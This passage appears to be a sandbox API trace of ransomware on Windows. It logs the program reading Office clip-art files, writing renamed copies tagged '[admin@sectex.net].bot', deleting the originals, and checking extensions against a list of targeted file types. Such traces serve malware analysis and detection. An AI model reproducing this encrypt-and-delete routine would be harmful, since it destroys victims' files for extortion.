	[0147.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.689] GetLastError () returned 0x0
	[0147.689] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3960, lpOverlapped=0x0) returned 1
	[0147.766] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3970, lpOverlapped=0x0) returned 1
	[0147.767] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.768] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.768] SetEndOfFile (hFile=0x38c) returned 1
	[0147.768] CloseHandle (hObject=0x38c) returned 1
	[0147.768] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.768] SetEndOfFile (hFile=0x31c) returned 1
	[0147.772] CloseHandle (hObject=0x31c) returned 1
	[0147.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.826] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf")) returned 1
	[0147.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.882] lstrlenW (lpString=".doc") returned 4
	[0147.882] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.882] lstrlenW (lpString=".docx") returned 5
	[0147.882] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.882] lstrlenW (lpString=".pdf") returned 4
	[0147.882] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.882] lstrlenW (lpString=".xls") returned 4
	[0147.882] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.882] lstrlenW (lpString=".xlsx") returned 5
	[0147.882] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.883] lstrlenW (lpString=".ppt") returned 4
	[0147.883] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString=".zip") returned 4
	[0147.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.883] lstrlenW (lpString=".rar") returned 4
	[0147.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString=".bz2") returned 4
	[0147.883] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString=".7z") returned 3
	[0147.883] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString=".dbf") returned 4
	[0147.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString=".1cd") returned 4
	[0147.883] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString=".jpg") returned 4
	[0147.883] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.883] lstrlenW (lpString=".doc") returned 4
	[0147.883] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString=".docx") returned 5
	[0147.883] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.883] lstrlenW (lpString=".pdf") returned 4
	[0147.883] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.883] lstrlenW (lpString=".xls") returned 4
	[0147.883] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.884] lstrlenW (lpString=".xlsx") returned 5
	[0147.884] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.884] lstrlenW (lpString=".ppt") returned 4
	[0147.884] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.884] lstrlenW (lpString=".zip") returned 4
	[0147.884] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.884] lstrlenW (lpString=".rar") returned 4
	[0147.884] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.884] lstrlenW (lpString=".bz2") returned 4
	[0147.884] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.884] lstrlenW (lpString=".7z") returned 3
	[0147.884] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.884] lstrlenW (lpString=".dbf") returned 4
	[0147.884] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.884] lstrlenW (lpString=".1cd") returned 4
	[0147.884] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63
	[0147.884] lstrlenW (lpString=".jpg") returned 4
	[0147.884] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.884] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.884] lstrlenW (lpString="HH00625_.WMF") returned 12
	[0147.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.885] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2116) returned 1
	[0147.885] CloseHandle (hObject=0x3ac) returned 1
	[0147.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf")) returned 0x20
	[0147.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.885] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.885] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.888] GetLastError () returned 0x0
	[0147.888] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x844, lpOverlapped=0x0) returned 1
	[0147.891] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x850, lpOverlapped=0x0) returned 1
	[0147.892] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.892] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.892] SetEndOfFile (hFile=0x398) returned 1
	[0147.892] CloseHandle (hObject=0x398) returned 1
	[0147.892] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.892] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.894] CloseHandle (hObject=0x3ac) returned 1
	[0147.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.895] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf")) returned 1
	[0147.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.895] lstrlenW (lpString=".doc") returned 4
	[0147.895] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.895] lstrlenW (lpString=".docx") returned 5
	[0147.896] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.896] lstrlenW (lpString=".pdf") returned 4
	[0147.896] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString=".xls") returned 4
	[0147.896] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.896] lstrlenW (lpString=".xlsx") returned 5
	[0147.896] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.896] lstrlenW (lpString=".ppt") returned 4
	[0147.896] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.896] lstrlenW (lpString=".zip") returned 4
	[0147.896] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.896] lstrlenW (lpString=".rar") returned 4
	[0147.896] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString=".bz2") returned 4
	[0147.896] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString=".7z") returned 3
	[0147.896] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.896] lstrlenW (lpString=".dbf") returned 4
	[0147.896] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.896] lstrlenW (lpString=".1cd") returned 4
	[0147.896] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.896] lstrlenW (lpString=".jpg") returned 4
	[0147.896] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.897] lstrlenW (lpString=".doc") returned 4
	[0147.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString=".docx") returned 5
	[0147.897] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.897] lstrlenW (lpString=".pdf") returned 4
	[0147.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString=".xls") returned 4
	[0147.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.897] lstrlenW (lpString=".xlsx") returned 5
	[0147.897] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.897] lstrlenW (lpString=".ppt") returned 4
	[0147.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.897] lstrlenW (lpString=".zip") returned 4
	[0147.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.897] lstrlenW (lpString=".rar") returned 4
	[0147.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString=".bz2") returned 4
	[0147.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString=".7z") returned 3
	[0147.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.897] lstrlenW (lpString=".dbf") returned 4
	[0147.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.897] lstrlenW (lpString=".1cd") returned 4
	[0147.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63
	[0147.897] lstrlenW (lpString=".jpg") returned 4
	[0147.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.898] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.898] lstrlenW (lpString="HH00636_.WMF") returned 12
	[0147.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.950] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1568) returned 1
	[0147.962] CloseHandle (hObject=0x31c) returned 1
	[0147.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf")) returned 0x20
	[0147.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.982] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.982] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.315] GetLastError () returned 0x0
	[0148.315] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x620, lpOverlapped=0x0) returned 1
	[0148.317] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x630, lpOverlapped=0x0) returned 1
	[0148.318] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.318] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.318] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.318] CloseHandle (hObject=0x3c0) returned 1
	[0148.318] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.318] SetEndOfFile (hFile=0x31c) returned 1
	[0148.320] CloseHandle (hObject=0x31c) returned 1
	[0148.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.406] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf")) returned 1
	[0148.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.407] lstrlenW (lpString=".doc") returned 4
	[0148.407] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.407] lstrlenW (lpString=".docx") returned 5
	[0148.407] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.407] lstrlenW (lpString=".pdf") returned 4
	[0148.408] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString=".xls") returned 4
	[0148.408] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.408] lstrlenW (lpString=".xlsx") returned 5
	[0148.408] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.408] lstrlenW (lpString=".ppt") returned 4
	[0148.408] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString=".zip") returned 4
	[0148.408] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.408] lstrlenW (lpString=".rar") returned 4
	[0148.408] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString=".bz2") returned 4
	[0148.408] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString=".7z") returned 3
	[0148.408] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString=".dbf") returned 4
	[0148.408] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString=".1cd") returned 4
	[0148.408] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString=".jpg") returned 4
	[0148.408] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.408] lstrlenW (lpString=".doc") returned 4
	[0148.408] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.408] lstrlenW (lpString=".docx") returned 5
	[0148.408] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.409] lstrlenW (lpString=".pdf") returned 4
	[0148.409] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString=".xls") returned 4
	[0148.409] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.409] lstrlenW (lpString=".xlsx") returned 5
	[0148.409] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.409] lstrlenW (lpString=".ppt") returned 4
	[0148.409] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.409] lstrlenW (lpString=".zip") returned 4
	[0148.409] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.409] lstrlenW (lpString=".rar") returned 4
	[0148.409] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString=".bz2") returned 4
	[0148.409] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString=".7z") returned 3
	[0148.409] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.409] lstrlenW (lpString=".dbf") returned 4
	[0148.409] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.409] lstrlenW (lpString=".1cd") returned 4
	[0148.409] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63
	[0148.409] lstrlenW (lpString=".jpg") returned 4
	[0148.409] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.409] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.410] lstrlenW (lpString="HH01015_.WMF") returned 12
	[0148.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.418] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1148) returned 1
	[0148.418] CloseHandle (hObject=0x3d4) returned 1
	[0148.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf")) returned 0x20
	[0148.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.418] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.418] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
